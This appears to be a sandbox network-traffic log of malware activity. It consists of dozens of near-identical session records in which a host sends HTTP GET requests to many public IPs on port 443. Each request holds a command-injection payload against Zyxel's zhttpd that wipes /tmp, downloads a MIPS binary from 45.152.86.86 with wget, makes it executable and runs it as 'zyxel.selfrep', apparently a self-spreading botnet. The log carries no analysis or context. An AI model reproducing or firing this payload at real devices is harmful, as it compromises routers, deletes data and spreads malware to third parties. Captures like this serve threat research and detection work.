                                        Mar 31, 2024 09:22:34.763382912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8622192.168.2.233504046.95.129.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763437986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8623192.168.2.2350238168.30.70.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763492107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8624192.168.2.2348984121.106.42.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763561964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8625192.168.2.2356570164.205.37.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763612032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8626192.168.2.23371304.108.163.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763652086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8627192.168.2.2350010217.228.149.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763698101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8628192.168.2.234961652.47.65.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763761044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8629192.168.2.235805489.105.198.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763808012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8630192.168.2.234701264.67.245.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763844967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8631192.168.2.2333142170.78.215.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763890982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8632192.168.2.2335076189.80.118.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763946056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8633192.168.2.2340328146.144.104.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.763993979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8634192.168.2.2343808149.186.1.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764034986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8635192.168.2.2338948119.205.14.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764101028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8636192.168.2.2335044168.235.218.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764137983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8637192.168.2.2333678172.34.32.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764206886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8638192.168.2.2355018149.28.118.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764234066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8639192.168.2.234394646.101.152.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764285088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8640192.168.2.2350520100.230.56.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764312029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8641192.168.2.234417217.27.198.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764367104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8642192.168.2.2347396108.207.134.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764435053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8643192.168.2.2343672134.209.156.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764478922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8644192.168.2.2339104164.124.55.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764523029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8645192.168.2.2334526202.52.75.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764575958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8646192.168.2.235947842.165.102.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764672995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8647192.168.2.235755675.194.209.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764719009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8648192.168.2.2335732174.43.224.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764770031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8649192.168.2.233367654.249.1.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764839888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8650192.168.2.235951652.177.76.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764874935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8651192.168.2.233640671.88.6.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764923096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8652192.168.2.2353412200.37.215.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.764991045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8653192.168.2.2343878138.244.70.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765022993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8654192.168.2.2351318183.95.160.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765072107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8655192.168.2.235214063.135.216.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765141964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8656192.168.2.235081614.115.28.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765197992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8657192.168.2.2339240124.28.247.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765245914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8658192.168.2.234953683.111.248.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765294075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8659192.168.2.2334742138.193.21.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765386105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8660192.168.2.235393860.125.182.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765427113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8661192.168.2.2340736219.134.244.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765480042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8662192.168.2.2335188114.129.126.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765546083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8663192.168.2.235497249.220.179.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765578032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8664192.168.2.234387649.103.140.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765620947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8665192.168.2.2345362157.186.227.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765676975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8666192.168.2.235215480.9.41.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765733004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8667192.168.2.2339858176.159.193.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765770912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8668192.168.2.2355172145.209.254.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765815020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8669192.168.2.233604648.182.249.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765868902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8670192.168.2.234555438.218.233.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765891075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8671192.168.2.2352928136.33.61.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.765984058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8672192.168.2.2333910180.159.106.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766052008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8673192.168.2.234708480.166.99.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766145945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8674192.168.2.235672274.54.166.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766181946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8675192.168.2.2360284135.226.15.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766236067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8676192.168.2.2339734157.33.98.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766273022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8677192.168.2.2359248100.12.22.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766324043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8678192.168.2.235331264.118.161.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766365051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8679192.168.2.234508635.159.44.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766416073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8680192.168.2.234844431.44.40.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766459942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8681192.168.2.2349100121.45.221.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766504049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8682192.168.2.2352802186.82.191.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766546965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8683192.168.2.235259654.207.179.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766603947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8684192.168.2.234902281.235.221.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766663074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8685192.168.2.2332812134.85.111.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766710043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8686192.168.2.235771861.158.32.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766777992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8687192.168.2.2354518200.101.139.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766807079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8688192.168.2.2347158147.114.168.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.766877890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8689192.168.2.2341498162.107.156.213443
                                        TimestampBytes transferredDirectionData
